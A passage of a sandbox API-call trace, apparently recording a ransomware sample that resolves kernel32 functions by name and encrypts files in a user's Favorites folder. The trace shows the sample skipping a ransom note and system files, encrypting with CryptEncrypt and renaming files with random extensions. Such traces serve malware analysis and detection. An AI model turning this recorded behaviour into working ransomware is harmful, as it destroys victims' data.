returned="EnumCalendarInfoA" [0185.596] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.597] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.597] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.597] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.597] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.597] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.597] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.597] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.597] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.597] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.597] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.597] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu") returned 74 [0185.597] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu.2CSdPRV") returned 82 [0185.597] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.x72ftxu"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.X72ftxu.2CSdPRV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.x72ftxu.2csdprv"), dwFlags=0x0) returned 1 [0185.604] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.604] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.604] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.604] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaeee1860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url.8nOE", cAlternateFileName="MSNENT~1.8NO")) returned 1 [0185.604] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="DECRYPT-FILES.txt") returned 1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="autorun.inf") returned 1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="boot.ini") returned 1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="desktop.ini") returned 1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="ntuser.dat") returned -1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="iconcache.db") returned 1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="bootsect.bak") returned 1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="ntuser.dat.log") returned -1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="thumbs.db") returned -1 [0185.605] lstrcmpiW (lpString1="MSN Entertainment.url.8nOE", lpString2="Bootfont.bin") returned 1 [0185.605] lstrlenW (lpString="MSN Entertainment.url.8nOE") returned 26 [0185.605] lstrcmpiW (lpString1="8nOE", lpString2="lnk") returned -1 [0185.605] lstrcmpiW (lpString1="8nOE", lpString2="exe") returned -1 [0185.605] lstrcmpiW (lpString1="8nOE", lpString2="sys") returned -1 [0185.605] lstrcmpiW (lpString1="8nOE", lpString2="dll") returned -1 [0185.605] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0185.605] lstrlenW (lpString="MSN Entertainment.url.8nOE") returned 26 [0185.605] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0185.605] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Entertainment.url.8nOE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE" [0185.605] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.8nOE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.8noe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.606] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.606] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.606] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.606] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.606] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.606] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.606] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.607] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.607] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.607] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.607] CloseHandle (hObject=0x268) returned 1 [0185.607] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.607] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.608] CloseHandle (hObject=0x0) returned 0 [0185.609] CloseHandle (hObject=0x264) returned 1 [0185.609] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.609] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.609] GetTickCount () returned 0x1135a41 [0185.609] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.609] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.609] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.610] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.610] lstrlenA (lpString="kernel32.dll") returned 12 [0185.610] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.610] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.610] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.610] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.610] lstrlenA (lpString="ADDATOMA") returned 8 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.610] lstrlenA (lpString="ADDATOMW") returned 8 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.610] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.610] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.610] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.610] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.610] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.610] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.610] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.611] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.611] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.611] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.611] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.611] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.611] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.611] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.611] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.611] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.611] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.611] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.611] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.611] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.611] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.611] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.611] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.611] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.611] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.611] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.612] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.612] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.612] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.612] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.612] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.612] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.612] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.612] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.612] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.612] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.612] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.612] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.612] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.612] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.612] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.612] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.612] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.612] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.612] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.612] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.613] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.613] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.613] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.613] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.613] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.613] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.613] lstrlenA (lpString="BEEP") returned 4 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.613] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.613] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.613] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.613] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.613] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.613] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.613] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.613] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.613] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.613] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.613] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.613] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.614] lstrlenA (lpString="CANCELIO") returned 8 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.614] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.614] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.614] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.614] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.614] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.614] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.614] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.614] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.614] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.614] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") 